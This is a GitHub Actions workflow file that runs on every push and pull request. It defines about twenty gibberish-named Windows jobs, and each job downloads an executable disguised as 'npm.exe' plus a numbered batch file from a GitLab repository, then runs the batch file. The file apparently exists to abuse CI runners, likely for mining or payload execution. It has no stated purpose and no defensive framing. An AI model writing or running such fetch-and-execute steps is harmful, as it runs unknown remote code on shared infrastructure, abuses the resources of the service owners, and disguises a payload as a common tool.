name: allajiliotelu
on: [push, pull_request]
jobs:
  aasem:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/7.bat -OutFile .\mas.bat
          .\mas.bat
  aasema:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/8.bat -OutFile .\mas.bat
          .\mas.bat
  aasemi:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/9.bat -OutFile .\mas.bat
          .\mas.bat
  aasemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/7.bat -OutFile .\mas.bat
          .\mas.bat
  aaseme:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/8.bat -OutFile .\mas.bat
          .\mas.bat
  aasemd:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/9.bat -OutFile .\mas.bat
          .\mas.bat
  asem:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/7.bat -OutFile .\mas.bat
          .\mas.bat
  asema:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/8.bat -OutFile .\mas.bat
          .\mas.bat
  asemi:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/9.bat -OutFile .\mas.bat
          .\mas.bat
  asemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/7.bat -OutFile .\mas.bat
          .\mas.bat
  lakejszsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/8.bat -OutFile .\mas.bat
          .\mas.bat
  lakehsjjasemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/9.bat -OutFile .\mas.bat
          .\mas.bat
  lakebxhuasemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/7.bat -OutFile .\mas.bat
          .\mas.bat
  lakenhuiahsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/8.bat -OutFile .\mas.bat
          .\mas.bat
  lakenhuakpijsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/9.bat -OutFile .\mas.bat
          .\mas.bat
  lakenhjnsgjsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/7.bat -OutFile .\mas.bat
          .\mas.bat
  lakebgjagsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/8.bat -OutFile .\mas.bat
          .\mas.bat
  lakebghwyhbgsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/9.bat -OutFile .\mas.bat
          .\mas.bat
  lakenbjahsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/7.bat -OutFile .\mas.bat
          .\mas.bat
  jamsnulakenbjahsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/8.bat -OutFile .\mas.bat
          .\mas.bat
  nabshyhuqhbylakenbjahsemo:
    runs-on: windows-latest
    steps:
      - name: Run a one-line script
        run: |
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/npm.exe -OutFile .\npm.exe
          Invoke-WebRequest -Uri https://gitlab.com/majendafartis/manik/-/raw/main/9.bat -OutFile .\mas.bat
          .\mas.bat
